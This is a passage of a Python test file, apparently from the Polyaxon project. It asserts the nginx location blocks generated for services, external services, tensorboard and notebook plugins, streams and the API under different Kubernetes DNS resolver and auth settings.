proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
proxy_hide_header X-Frame-Options;
proxy_set_header Origin "";
proxy_set_header Host $http_host;
proxy_set_header X-Real-IP $remote_addr;
proxy_buffering off;
}
""" # noqa
settings.PROXIES_CONFIG.dns_use_resolver = False
resolver = get_resolver()
assert (
get_services_location_config(resolver=resolver, auth="", rewrite=True)
== expected
)
expected = r"""
location ~ /rewrite-services/v1/([-_.:\w]+)/([-_.:\w]+)/([-_.:\w]+)/runs/([-_.:\w]+)/(.*) {
auth_request /auth/v1/;
auth_request_set $auth_status $upstream_status;
resolver kube-dns.kube-system.svc.new-dns valid=5s;
rewrite_log on;
rewrite ^/rewrite-services/v1/([-_.:\w]+)/([-_.:\w]+)/([-_.:\w]+)/runs/([-_.:\w]+)/(.*) /$5 break;
proxy_pass http://plx-operation-$4.$1.svc.new-dns;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
proxy_hide_header X-Frame-Options;
proxy_set_header Origin "";
proxy_set_header Host $http_host;
proxy_set_header X-Real-IP $remote_addr;
proxy_buffering off;
}
""" # noqa
settings.PROXIES_CONFIG.auth_enabled = True
settings.PROXIES_CONFIG.dns_prefix = "kube-dns.kube-system"
settings.PROXIES_CONFIG.dns_use_resolver = True
settings.PROXIES_CONFIG.dns_custom_cluster = "new-dns"
resolver = get_resolver()
assert (
get_services_location_config(
resolver=resolver, auth=get_auth_config(), rewrite=True
)
== expected
)
def test_services_dns_backend(self):
settings.PROXIES_CONFIG.auth_enabled = False
settings.PROXIES_CONFIG.dns_use_resolver = True
expected = r"""
location ~ /rewrite-services/v1/([-_.:\w]+)/([-_.:\w]+)/([-_.:\w]+)/runs/([-_.:\w]+)/(.*) {
resolver kube-dns.kube-system.svc.cluster.local valid=5s;
rewrite_log on;
rewrite ^/rewrite-services/v1/([-_.:\w]+)/([-_.:\w]+)/([-_.:\w]+)/runs/([-_.:\w]+)/(.*) /$5 break;
proxy_pass http://plx-operation-$4.$1.svc.cluster.local;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
proxy_hide_header X-Frame-Options;
proxy_set_header Origin "";
proxy_set_header Host $http_host;
proxy_set_header X-Real-IP $remote_addr;
proxy_buffering off;
}
""" # noqa
settings.PROXIES_CONFIG.dns_custom_cluster = "cluster.local"
assert get_dns_config() == "kube-dns.kube-system.svc.cluster.local"
resolver = get_resolver()
assert (
get_services_location_config(resolver=resolver, auth="", rewrite=True)
== expected
)
expected = r"""
location ~ /rewrite-services/v1/([-_.:\w]+)/([-_.:\w]+)/([-_.:\w]+)/runs/([-_.:\w]+)/(.*) {
auth_request /auth/v1/;
auth_request_set $auth_status $upstream_status;
resolver kube-dns.kube-system.svc.new-dns valid=5s;
rewrite_log on;
rewrite ^/rewrite-services/v1/([-_.:\w]+)/([-_.:\w]+)/([-_.:\w]+)/runs/([-_.:\w]+)/(.*) /$5 break;
proxy_pass http://plx-operation-$4.$1.svc.new-dns;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
proxy_hide_header X-Frame-Options;
proxy_set_header Origin "";
proxy_set_header Host $http_host;
proxy_set_header X-Real-IP $remote_addr;
proxy_buffering off;
}
""" # noqa
settings.PROXIES_CONFIG.auth_enabled = True
settings.PROXIES_CONFIG.dns_custom_cluster = "new-dns"
assert get_dns_config() == "kube-dns.kube-system.svc.new-dns"
resolver = get_resolver()
assert (
get_services_location_config(
resolver=resolver, auth=get_auth_config(), rewrite=True
)
== expected
)
def test_services_dns_prefix(self):
settings.PROXIES_CONFIG.auth_enabled = True
settings.PROXIES_CONFIG.dns_use_resolver = True
expected = r"""
location ~ /rewrite-services/v1/([-_.:\w]+)/([-_.:\w]+)/([-_.:\w]+)/runs/([-_.:\w]+)/(.*) {
auth_request /auth/v1/;
auth_request_set $auth_status $upstream_status;
resolver coredns.kube-system.svc.cluster.local valid=5s;
rewrite_log on;
rewrite ^/rewrite-services/v1/([-_.:\w]+)/([-_.:\w]+)/([-_.:\w]+)/runs/([-_.:\w]+)/(.*) /$5 break;
proxy_pass http://plx-operation-$4.$1.svc.cluster.local;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
proxy_hide_header X-Frame-Options;
proxy_set_header Origin "";
proxy_set_header Host $http_host;
proxy_set_header X-Real-IP $remote_addr;
proxy_buffering off;
}
""" # noqa
settings.PROXIES_CONFIG.dns_prefix = "coredns.kube-system"
settings.PROXIES_CONFIG.dns_custom_cluster = "cluster.local"
assert get_dns_config() == "coredns.kube-system.svc.cluster.local"
resolver = get_resolver()
assert (
get_services_location_config(
resolver=resolver, auth=get_auth_config(), rewrite=True
)
== expected
)
expected = r"""
location ~ /rewrite-services/v1/([-_.:\w]+)/([-_.:\w]+)/([-_.:\w]+)/runs/([-_.:\w]+)/(.*) {
auth_request /auth/v1/;
auth_request_set $auth_status $upstream_status;
resolver kube-dns.new-system.svc.new-dns valid=5s;
rewrite_log on;
rewrite ^/rewrite-services/v1/([-_.:\w]+)/([-_.:\w]+)/([-_.:\w]+)/runs/([-_.:\w]+)/(.*) /$5 break;
proxy_pass http://plx-operation-$4.$1.svc.new-dns;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
proxy_hide_header X-Frame-Options;
proxy_set_header Origin "";
proxy_set_header Host $http_host;
proxy_set_header X-Real-IP $remote_addr;
proxy_buffering off;
}
""" # noqa
settings.PROXIES_CONFIG.dns_prefix = "kube-dns.new-system"
settings.PROXIES_CONFIG.dns_custom_cluster = "new-dns"
assert get_dns_config() == "kube-dns.new-system.svc.new-dns"
resolver = get_resolver()
assert (
get_services_location_config(
resolver=resolver, auth=get_auth_config(), rewrite=True
)
== expected
)
@pytest.mark.proxies_mark
class TestGatewayExternalSchemas(BaseTestCase):
SET_PROXIES_SETTINGS = True
def test_external_dns_resolver(self):
settings.PROXIES_CONFIG.auth_enabled = False
expected = r"""
location ~ /external/v1/([-_.:\w]+)/([-_.:\w]+)/([-_.:\w]+)/runs/([-_.:\w]+)/(.*) {
proxy_pass http://plx-operation-$4-ext.$1.svc.cluster.local;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
proxy_hide_header X-Frame-Options;
proxy_set_header Origin "";
proxy_set_header Host $http_host;
proxy_set_header X-Real-IP $remote_addr;
proxy_buffering off;
}
""" # noqa
settings.PROXIES_CONFIG.dns_use_resolver = False
resolver = get_resolver()
assert (
get_services_location_config(
resolver=resolver, auth="", rewrite=False, external=True
)
== expected
)
expected = r"""
location ~ /external/v1/([-_.:\w]+)/([-_.:\w]+)/([-_.:\w]+)/runs/([-_.:\w]+)/(.*) {
resolver kube-dns.kube-system.svc.new-dns valid=5s;
proxy_pass http://plx-operation-$4-ext.$1.svc.new-dns;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
proxy_hide_header X-Frame-Options;
proxy_set_header Origin "";
proxy_set_header Host $http_host;
proxy_set_header X-Real-IP $remote_addr;
proxy_buffering off;
}
""" # noqa
settings.PROXIES_CONFIG.auth_enabled = True
settings.PROXIES_CONFIG.dns_prefix = "kube-dns.kube-system"
settings.PROXIES_CONFIG.dns_use_resolver = True
settings.PROXIES_CONFIG.dns_custom_cluster = "new-dns"
resolver = get_resolver()
assert (
get_services_location_config(
resolver=resolver, auth=get_auth_config(), rewrite=False, external=True
)
== expected
)
def test_external_dns_backend(self):
settings.PROXIES_CONFIG.auth_enabled = False
settings.PROXIES_CONFIG.dns_use_resolver = True
expected = r"""
location ~ /external/v1/([-_.:\w]+)/([-_.:\w]+)/([-_.:\w]+)/runs/([-_.:\w]+)/(.*) {
resolver kube-dns.kube-system.svc.cluster.local valid=5s;
proxy_pass http://plx-operation-$4-ext.$1.svc.cluster.local;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
proxy_hide_header X-Frame-Options;
proxy_set_header Origin "";
proxy_set_header Host $http_host;
proxy_set_header X-Real-IP $remote_addr;
proxy_buffering off;
}
""" # noqa
settings.PROXIES_CONFIG.dns_custom_cluster = "cluster.local"
assert get_dns_config() == "kube-dns.kube-system.svc.cluster.local"
resolver = get_resolver()
assert (
get_services_location_config(
resolver=resolver, auth="", rewrite=False, external=True
)
== expected
)
expected = r"""
location ~ /external/v1/([-_.:\w]+)/([-_.:\w]+)/([-_.:\w]+)/runs/([-_.:\w]+)/(.*) {
resolver kube-dns.kube-system.svc.new-dns valid=5s;
proxy_pass http://plx-operation-$4-ext.$1.svc.new-dns;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
proxy_hide_header X-Frame-Options;
proxy_set_header Origin "";
proxy_set_header Host $http_host;
proxy_set_header X-Real-IP $remote_addr;
proxy_buffering off;
}
""" # noqa
settings.PROXIES_CONFIG.auth_enabled = True
settings.PROXIES_CONFIG.dns_custom_cluster = "new-dns"
assert get_dns_config() == "kube-dns.kube-system.svc.new-dns"
resolver = get_resolver()
assert (
get_services_location_config(
resolver=resolver, auth=get_auth_config(), rewrite=False, external=True
)
== expected
)
def test_external_dns_prefix(self):
settings.PROXIES_CONFIG.auth_enabled = True
settings.PROXIES_CONFIG.dns_use_resolver = True
expected = r"""
location ~ /external/v1/([-_.:\w]+)/([-_.:\w]+)/([-_.:\w]+)/runs/([-_.:\w]+)/(.*) {
resolver coredns.kube-system.svc.cluster.local valid=5s;
proxy_pass http://plx-operation-$4-ext.$1.svc.cluster.local;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
proxy_hide_header X-Frame-Options;
proxy_set_header Origin "";
proxy_set_header Host $http_host;
proxy_set_header X-Real-IP $remote_addr;
proxy_buffering off;
}
""" # noqa
settings.PROXIES_CONFIG.dns_prefix = "coredns.kube-system"
settings.PROXIES_CONFIG.dns_custom_cluster = "cluster.local"
assert get_dns_config() == "coredns.kube-system.svc.cluster.local"
resolver = get_resolver()
assert (
get_services_location_config(
resolver=resolver,
auth=get_auth_config(),
rewrite=False,
external=True,
)
== expected
)
expected = r"""
location ~ /external/v1/([-_.:\w]+)/([-_.:\w]+)/([-_.:\w]+)/runs/([-_.:\w]+)/(.*) {
resolver kube-dns.new-system.svc.new-dns valid=5s;
proxy_pass http://plx-operation-$4-ext.$1.svc.new-dns;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
proxy_hide_header X-Frame-Options;
proxy_set_header Origin "";
proxy_set_header Host $http_host;
proxy_set_header X-Real-IP $remote_addr;
proxy_buffering off;
}
""" # noqa
settings.PROXIES_CONFIG.dns_prefix = "kube-dns.new-system"
settings.PROXIES_CONFIG.dns_custom_cluster = "new-dns"
assert get_dns_config() == "kube-dns.new-system.svc.new-dns"
resolver = get_resolver()
assert (
get_services_location_config(
resolver=resolver, auth=get_auth_config(), rewrite=False, external=True
)
== expected
)
@pytest.mark.proxies_mark
class TestGatewayRewriteExternalSchemas(BaseTestCase):
SET_PROXIES_SETTINGS = True
def test_external_dns_resolver(self):
settings.PROXIES_CONFIG.auth_enabled = False
expected = r"""
location ~ /rewrite-external/v1/([-_.:\w]+)/([-_.:\w]+)/([-_.:\w]+)/runs/([-_.:\w]+)/(.*) {
rewrite_log on;
rewrite ^/rewrite-external/v1/([-_.:\w]+)/([-_.:\w]+)/([-_.:\w]+)/runs/([-_.:\w]+)/(.*) /$5 break;
proxy_pass http://plx-operation-$4-ext.$1.svc.cluster.local;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
proxy_hide_header X-Frame-Options;
proxy_set_header Origin "";
proxy_set_header Host $http_host;
proxy_set_header X-Real-IP $remote_addr;
proxy_buffering off;
}
""" # noqa
settings.PROXIES_CONFIG.dns_use_resolver = False
resolver = get_resolver()
assert (
get_services_location_config(
resolver=resolver, auth="", rewrite=True, external=True
)
== expected
)
expected = r"""
location ~ /rewrite-external/v1/([-_.:\w]+)/([-_.:\w]+)/([-_.:\w]+)/runs/([-_.:\w]+)/(.*) {
resolver kube-dns.kube-system.svc.new-dns valid=5s;
rewrite_log on;
rewrite ^/rewrite-external/v1/([-_.:\w]+)/([-_.:\w]+)/([-_.:\w]+)/runs/([-_.:\w]+)/(.*) /$5 break;
proxy_pass http://plx-operation-$4-ext.$1.svc.new-dns;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
proxy_hide_header X-Frame-Options;
proxy_set_header Origin "";
proxy_set_header Host $http_host;
proxy_set_header X-Real-IP $remote_addr;
proxy_buffering off;
}
""" # noqa
settings.PROXIES_CONFIG.auth_enabled = True
settings.PROXIES_CONFIG.dns_prefix = "kube-dns.kube-system"
settings.PROXIES_CONFIG.dns_use_resolver = True
settings.PROXIES_CONFIG.dns_custom_cluster = "new-dns"
resolver = get_resolver()
assert (
get_services_location_config(
resolver=resolver, auth=get_auth_config(), rewrite=True, external=True
)
== expected
)
def test_external_dns_backend(self):
settings.PROXIES_CONFIG.auth_enabled = False
settings.PROXIES_CONFIG.dns_use_resolver = True
expected = r"""
location ~ /rewrite-external/v1/([-_.:\w]+)/([-_.:\w]+)/([-_.:\w]+)/runs/([-_.:\w]+)/(.*) {
resolver kube-dns.kube-system.svc.cluster.local valid=5s;
rewrite_log on;
rewrite ^/rewrite-external/v1/([-_.:\w]+)/([-_.:\w]+)/([-_.:\w]+)/runs/([-_.:\w]+)/(.*) /$5 break;
proxy_pass http://plx-operation-$4-ext.$1.svc.cluster.local;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
proxy_hide_header X-Frame-Options;
proxy_set_header Origin "";
proxy_set_header Host $http_host;
proxy_set_header X-Real-IP $remote_addr;
proxy_buffering off;
}
""" # noqa
settings.PROXIES_CONFIG.dns_custom_cluster = "cluster.local"
assert get_dns_config() == "kube-dns.kube-system.svc.cluster.local"
resolver = get_resolver()
assert (
get_services_location_config(
resolver=resolver, auth="", rewrite=True, external=True
)
== expected
)
expected = r"""
location ~ /rewrite-external/v1/([-_.:\w]+)/([-_.:\w]+)/([-_.:\w]+)/runs/([-_.:\w]+)/(.*) {
resolver kube-dns.kube-system.svc.new-dns valid=5s;
rewrite_log on;
rewrite ^/rewrite-external/v1/([-_.:\w]+)/([-_.:\w]+)/([-_.:\w]+)/runs/([-_.:\w]+)/(.*) /$5 break;
proxy_pass http://plx-operation-$4-ext.$1.svc.new-dns;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
proxy_hide_header X-Frame-Options;
proxy_set_header Origin "";
proxy_set_header Host $http_host;
proxy_set_header X-Real-IP $remote_addr;
proxy_buffering off;
}
""" # noqa
settings.PROXIES_CONFIG.auth_enabled = True
settings.PROXIES_CONFIG.dns_custom_cluster = "new-dns"
assert get_dns_config() == "kube-dns.kube-system.svc.new-dns"
resolver = get_resolver()
assert (
get_services_location_config(
resolver=resolver,
auth=get_auth_config(),
rewrite=True,
external=True,
)
== expected
)
def test_external_dns_prefix(self):
settings.PROXIES_CONFIG.auth_enabled = True
settings.PROXIES_CONFIG.dns_use_resolver = True
expected = r"""
location ~ /rewrite-external/v1/([-_.:\w]+)/([-_.:\w]+)/([-_.:\w]+)/runs/([-_.:\w]+)/(.*) {
resolver coredns.kube-system.svc.cluster.local valid=5s;
rewrite_log on;
rewrite ^/rewrite-external/v1/([-_.:\w]+)/([-_.:\w]+)/([-_.:\w]+)/runs/([-_.:\w]+)/(.*) /$5 break;
proxy_pass http://plx-operation-$4-ext.$1.svc.cluster.local;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
proxy_hide_header X-Frame-Options;
proxy_set_header Origin "";
proxy_set_header Host $http_host;
proxy_set_header X-Real-IP $remote_addr;
proxy_buffering off;
}
""" # noqa
settings.PROXIES_CONFIG.dns_prefix = "coredns.kube-system"
settings.PROXIES_CONFIG.dns_custom_cluster = "cluster.local"
assert get_dns_config() == "coredns.kube-system.svc.cluster.local"
resolver = get_resolver()
assert (
get_services_location_config(
resolver=resolver, auth=get_auth_config(), rewrite=True, external=True
)
== expected
)
expected = r"""
location ~ /rewrite-external/v1/([-_.:\w]+)/([-_.:\w]+)/([-_.:\w]+)/runs/([-_.:\w]+)/(.*) {
resolver kube-dns.new-system.svc.new-dns valid=5s;
rewrite_log on;
rewrite ^/rewrite-external/v1/([-_.:\w]+)/([-_.:\w]+)/([-_.:\w]+)/runs/([-_.:\w]+)/(.*) /$5 break;
proxy_pass http://plx-operation-$4-ext.$1.svc.new-dns;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
proxy_hide_header X-Frame-Options;
proxy_set_header Origin "";
proxy_set_header Host $http_host;
proxy_set_header X-Real-IP $remote_addr;
proxy_buffering off;
}
""" # noqa
settings.PROXIES_CONFIG.dns_prefix = "kube-dns.new-system"
settings.PROXIES_CONFIG.dns_custom_cluster = "new-dns"
assert get_dns_config() == "kube-dns.new-system.svc.new-dns"
resolver = get_resolver()
assert (
get_services_location_config(
resolver=resolver, auth=get_auth_config(), rewrite=True, external=True
)
== expected
)
@pytest.mark.proxies_mark
class TestGatewayPluginsSchemas(BaseTestCase):
SET_PROXIES_SETTINGS = True
def test_no_plugins(self):
assert get_plugins_location_config(resolver="", auth="") == []
def test_plugins(self):
proxy_services = {"tensorboard": {"port": 6006}, "notebook": {"port": 8888}}
assert (
len(
get_plugins_location_config(
resolver="", auth="", proxy_services=proxy_services
)
)
== 2
)
def test_plugins_dns_resolver(self):
settings.PROXIES_CONFIG.auth_enabled = False
proxy_services = {"tensorboard": {"port": 6006}, "notebook": {"port": 8888}}
expected = r"""
location ~ /tensorboard/proxy/([-_.:\w]+)/(.*) {
rewrite_log on;
rewrite ^/tensorboard/proxy/([-_.:\w]+)/(.*) /tensorboard/proxy/$1/$2 break;
proxy_pass http://$1:6006;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
proxy_hide_header X-Frame-Options;
proxy_set_header Origin "";
proxy_buffering off;
}
location ~ /notebook/proxy/([-_.:\w]+)/(.*) {
rewrite_log on;
rewrite ^/notebook/proxy/([-_.:\w]+)/(.*) /notebook/proxy/$1/$2 break;
proxy_pass http://$1:8888;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
proxy_hide_header X-Frame-Options;
proxy_set_header Origin "";
proxy_buffering off;
}
""" # noqa
settings.PROXIES_CONFIG.dns_use_resolver = False
resolver = get_resolver()
assert (
"\n".join(
get_plugins_location_config(
resolver=resolver, auth="", proxy_services=proxy_services
)
)
== expected
)
expected = r"""
location ~ /tensorboard/proxy/([-_.:\w]+)/(.*) {
auth_request /auth/v1/;
auth_request_set $auth_status $upstream_status;
resolver kube-dns.kube-system.svc.new-dns valid=5s;
rewrite_log on;
rewrite ^/tensorboard/proxy/([-_.:\w]+)/(.*) /tensorboard/proxy/$1/$2 break;
proxy_pass http://$1:6006;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
proxy_hide_header X-Frame-Options;
proxy_set_header Origin "";
proxy_buffering off;
}
location ~ /notebook/proxy/([-_.:\w]+)/(.*) {
auth_request /auth/v1/;
auth_request_set $auth_status $upstream_status;
resolver kube-dns.kube-system.svc.new-dns valid=5s;
rewrite_log on;
rewrite ^/notebook/proxy/([-_.:\w]+)/(.*) /notebook/proxy/$1/$2 break;
proxy_pass http://$1:8888;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
proxy_hide_header X-Frame-Options;
proxy_set_header Origin "";
proxy_buffering off;
}
""" # noqa
settings.PROXIES_CONFIG.auth_enabled = True
settings.PROXIES_CONFIG.dns_prefix = "kube-dns.kube-system"
settings.PROXIES_CONFIG.dns_use_resolver = True
settings.PROXIES_CONFIG.dns_custom_cluster = "new-dns"
resolver = get_resolver()
assert (
"\n".join(
get_plugins_location_config(
resolver=resolver,
auth=get_auth_config(),
proxy_services=proxy_services,
)
)
== expected
)
def test_plugins_dns_backend(self):
proxy_services = {"tensorboard": {"port": 6006}, "notebook": {"port": 8888}}
settings.PROXIES_CONFIG.auth_enabled = False
settings.PROXIES_CONFIG.dns_use_resolver = True
expected = r"""
location ~ /tensorboard/proxy/([-_.:\w]+)/(.*) {
resolver kube-dns.kube-system.svc.cluster.local valid=5s;
rewrite_log on;
rewrite ^/tensorboard/proxy/([-_.:\w]+)/(.*) /tensorboard/proxy/$1/$2 break;
proxy_pass http://$1:6006;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
proxy_hide_header X-Frame-Options;
proxy_set_header Origin "";
proxy_buffering off;
}
location ~ /notebook/proxy/([-_.:\w]+)/(.*) {
resolver kube-dns.kube-system.svc.cluster.local valid=5s;
rewrite_log on;
rewrite ^/notebook/proxy/([-_.:\w]+)/(.*) /notebook/proxy/$1/$2 break;
proxy_pass http://$1:8888;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
proxy_hide_header X-Frame-Options;
proxy_set_header Origin "";
proxy_buffering off;
}
""" # noqa
settings.PROXIES_CONFIG.dns_custom_cluster = "cluster.local"
assert get_dns_config() == "kube-dns.kube-system.svc.cluster.local"
resolver = get_resolver()
assert (
"\n".join(
get_plugins_location_config(
resolver=resolver, auth="", proxy_services=proxy_services
)
)
== expected
)
expected = r"""
location ~ /tensorboard/proxy/([-_.:\w]+)/(.*) {
auth_request /auth/v1/;
auth_request_set $auth_status $upstream_status;
resolver kube-dns.kube-system.svc.new-dns valid=5s;
rewrite_log on;
rewrite ^/tensorboard/proxy/([-_.:\w]+)/(.*) /tensorboard/proxy/$1/$2 break;
proxy_pass http://$1:6006;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
proxy_hide_header X-Frame-Options;
proxy_set_header Origin "";
proxy_buffering off;
}
location ~ /notebook/proxy/([-_.:\w]+)/(.*) {
auth_request /auth/v1/;
auth_request_set $auth_status $upstream_status;
resolver kube-dns.kube-system.svc.new-dns valid=5s;
rewrite_log on;
rewrite ^/notebook/proxy/([-_.:\w]+)/(.*) /notebook/proxy/$1/$2 break;
proxy_pass http://$1:8888;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
proxy_hide_header X-Frame-Options;
proxy_set_header Origin "";
proxy_buffering off;
}
""" # noqa
settings.PROXIES_CONFIG.auth_enabled = True
settings.PROXIES_CONFIG.dns_custom_cluster = "new-dns"
assert get_dns_config() == "kube-dns.kube-system.svc.new-dns"
resolver = get_resolver()
assert (
"\n".join(
get_plugins_location_config(
resolver=resolver,
auth=get_auth_config(),
proxy_services=proxy_services,
)
)
== expected
)
def test_plugins_dns_prefix(self):
proxy_services = {"tensorboard": {"port": 6006}, "notebook": {"port": 8888}}
settings.PROXIES_CONFIG.auth_enabled = True
settings.PROXIES_CONFIG.dns_use_resolver = True
expected = r"""
location ~ /tensorboard/proxy/([-_.:\w]+)/(.*) {
auth_request /auth/v1/;
auth_request_set $auth_status $upstream_status;
resolver coredns.kube-system.svc.cluster.local valid=5s;
rewrite_log on;
rewrite ^/tensorboard/proxy/([-_.:\w]+)/(.*) /tensorboard/proxy/$1/$2 break;
proxy_pass http://$1:6006;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
proxy_hide_header X-Frame-Options;
proxy_set_header Origin "";
proxy_buffering off;
}
location ~ /notebook/proxy/([-_.:\w]+)/(.*) {
auth_request /auth/v1/;
auth_request_set $auth_status $upstream_status;
resolver coredns.kube-system.svc.cluster.local valid=5s;
rewrite_log on;
rewrite ^/notebook/proxy/([-_.:\w]+)/(.*) /notebook/proxy/$1/$2 break;
proxy_pass http://$1:8888;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
proxy_hide_header X-Frame-Options;
proxy_set_header Origin "";
proxy_buffering off;
}
""" # noqa
settings.PROXIES_CONFIG.dns_prefix = "coredns.kube-system"
settings.PROXIES_CONFIG.dns_custom_cluster = "cluster.local"
assert get_dns_config() == "coredns.kube-system.svc.cluster.local"
resolver = get_resolver()
assert (
"\n".join(
get_plugins_location_config(
resolver=resolver,
auth=get_auth_config(),
proxy_services=proxy_services,
)
)
== expected
)
expected = r"""
location ~ /tensorboard/proxy/([-_.:\w]+)/(.*) {
auth_request /auth/v1/;
auth_request_set $auth_status $upstream_status;
resolver kube-dns.new-system.svc.new-dns valid=5s;
rewrite_log on;
rewrite ^/tensorboard/proxy/([-_.:\w]+)/(.*) /tensorboard/proxy/$1/$2 break;
proxy_pass http://$1:6006;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
proxy_hide_header X-Frame-Options;
proxy_set_header Origin "";
proxy_buffering off;
}
location ~ /notebook/proxy/([-_.:\w]+)/(.*) {
auth_request /auth/v1/;
auth_request_set $auth_status $upstream_status;
resolver kube-dns.new-system.svc.new-dns valid=5s;
rewrite_log on;
rewrite ^/notebook/proxy/([-_.:\w]+)/(.*) /notebook/proxy/$1/$2 break;
proxy_pass http://$1:8888;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
proxy_hide_header X-Frame-Options;
proxy_set_header Origin "";
proxy_buffering off;
}
""" # noqa
settings.PROXIES_CONFIG.dns_prefix = "kube-dns.new-system"
settings.PROXIES_CONFIG.dns_custom_cluster = "new-dns"
assert get_dns_config() == "kube-dns.new-system.svc.new-dns"
resolver = get_resolver()
assert (
"\n".join(
get_plugins_location_config(
resolver=resolver,
auth=get_auth_config(),
proxy_services=proxy_services,
)
)
== expected
)
@pytest.mark.proxies_mark
class TestGatewayStreamsSchemas(BaseTestCase):
SET_PROXIES_SETTINGS = True
def test_streams_location_with_auth_config(self):
expected = r"""
location /streams/ {
proxy_pass http://polyaxon-polyaxon-streams;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
proxy_set_header Origin "";
proxy_set_header Host $http_host;
proxy_set_header X-Real-IP $remote_addr;
proxy_buffering off;
}
""" # noqa
assert get_streams_location_config(resolver="", auth="") == expected
settings.PROXIES_CONFIG.streams_port = 8888
settings.PROXIES_CONFIG.auth_enabled = True
settings.PROXIES_CONFIG.streams_host = "foo"
expected = r"""
location /streams/ {
auth_request /auth/v1/;
auth_request_set $auth_status $upstream_status;
proxy_pass http://foo:8888;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
proxy_set_header Origin "";
proxy_set_header Host $http_host;
proxy_set_header X-Real-IP $remote_addr;
proxy_buffering off;
}
""" # noqa
assert (
get_streams_location_config(resolver="", auth=get_auth_config()) == expected
)
def test_streams_location_with_dns_prefix(self):
settings.PROXIES_CONFIG.auth_enabled = False
settings.PROXIES_CONFIG.dns_use_resolver = True
expected = r"""
location /streams/ {
resolver coredns.kube-system.svc.cluster.local valid=5s;
proxy_pass http://polyaxon-polyaxon-streams;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
proxy_set_header Origin "";
proxy_set_header Host $http_host;
proxy_set_header X-Real-IP $remote_addr;
proxy_buffering off;
}
""" # noqa
settings.PROXIES_CONFIG.dns_prefix = "coredns.kube-system"
settings.PROXIES_CONFIG.dns_custom_cluster = "cluster.local"
assert get_dns_config() == "coredns.kube-system.svc.cluster.local"
resolver = get_resolver()
assert get_streams_location_config(resolver=resolver, auth="") == expected
expected = r"""
location /streams/ {
auth_request /auth/v1/;
auth_request_set $auth_status $upstream_status;
resolver kube-dns.new-system.svc.new-dns valid=5s;
proxy_pass http://polyaxon-polyaxon-streams;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
proxy_set_header Origin "";
proxy_set_header Host $http_host;
proxy_set_header X-Real-IP $remote_addr;
proxy_buffering off;
}
""" # noqa
settings.PROXIES_CONFIG.auth_enabled = True
settings.PROXIES_CONFIG.dns_prefix = "kube-dns.new-system"
settings.PROXIES_CONFIG.dns_custom_cluster = "new-dns"
assert get_dns_config() == "kube-dns.new-system.svc.new-dns"
resolver = get_resolver()
assert (
get_streams_location_config(resolver=resolver, auth=get_auth_config())
== expected
)
@pytest.mark.proxies_mark
class TestGatewayApiSchemas(BaseTestCase):
SET_PROXIES_SETTINGS = True
def test_api_location_config(self):
expected = r"""
location = / {
proxy_pass http://polyaxon-polyaxon-api;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
proxy_set_header Origin "";
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header Host $http_host;
proxy_buffering off;
}
location /api/v1/ {
proxy_pass http://polyaxon-polyaxon-api;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
proxy_set_header Origin "";
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header Host $http_host;
proxy_buffering off;
}
location /ui/ {
proxy_pass http://polyaxon-polyaxon-api;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
